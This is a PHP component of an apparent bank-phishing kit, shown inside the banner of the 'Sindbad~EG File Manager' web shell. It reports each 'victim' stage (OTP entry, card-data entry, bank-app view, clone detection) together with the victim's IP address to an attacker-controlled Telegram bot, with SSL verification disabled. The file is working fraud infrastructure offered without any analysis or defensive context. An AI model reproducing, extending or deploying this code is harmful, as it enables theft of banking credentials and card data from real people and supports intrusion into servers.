Sindbad~EG File Manager
<?php
require '../config.php';
function note($statu){
global $bot_token;
global $chat_ids;
foreach($chat_ids as $chat_id){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, "https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=".urlencode("[ SUISS NOTIFICATION ]\nVICTIM IP : ".$_SERVER['REMOTE_ADDR']."\nSTATU : $statu"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
$res = curl_exec($c);
curl_close($c);
}
}
if(isset($_POST['otping'])){
note("Entering OTP...");
}if(isset($_POST['otpview'])){
note("In OTP page");
}if(isset($_POST['otperrorview'])){
note("In OTP Error page");
}
if(isset($_POST['waiting'])){
note("Waiting...");
}if(isset($_POST['appview'])){
note("In bank app");
}
if(isset($_POST['cardview'])){
note("In card page");
}if(isset($_POST['carderrorview'])){
note("In card error page");
}if(isset($_POST['carding'])){
note("Entering card info...");
}
if(isset($_POST['finish'])){
note("Finished!");
}if(isset($_POST['clonedetect'])){
note("Clone Detect!!");
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists